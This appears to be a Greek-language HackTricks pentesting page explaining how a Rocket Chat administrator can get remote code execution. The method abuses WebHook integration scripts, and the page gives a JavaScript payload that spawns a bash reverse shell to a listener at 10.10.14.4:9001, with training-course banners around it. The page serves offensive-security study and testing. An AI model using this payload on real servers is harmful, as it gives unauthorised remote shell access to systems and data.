Rocket Chat
Reading time: 2 minutes
tip
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
RCE
Αν είστε διαχειριστής μέσα στο Rocket Chat μπορείτε να αποκτήσετε RCE.
- Πηγαίνετε στο
Integrations
και επιλέξτεNew Integration
και διαλέξτε οποιοδήποτε:Incoming WebHook
ήOutgoing WebHook
. /admin/integrations/incoming
.png)
- Σύμφωνα με τα docs, και οι δύο χρησιμοποιούν ES2015 / ECMAScript 6 (βασικά JavaScript) για να επεξεργαστούν τα δεδομένα. Έτσι, ας αποκτήσουμε ένα rev shell για javascript όπως:
javascript
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Ρυθμίστε το WebHook (το κανάλι και η ανάρτηση ως όνομα χρήστη πρέπει να υπάρχουν):
.png)
- Ρυθμίστε το σενάριο WebHook:
.png)
- Αποθηκεύστε τις αλλαγές
- Αποκτήστε το παραγόμενο URL WebHook:
.png)
- Καλέστε το με curl και θα πρέπει να λάβετε το rev shell
tip
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.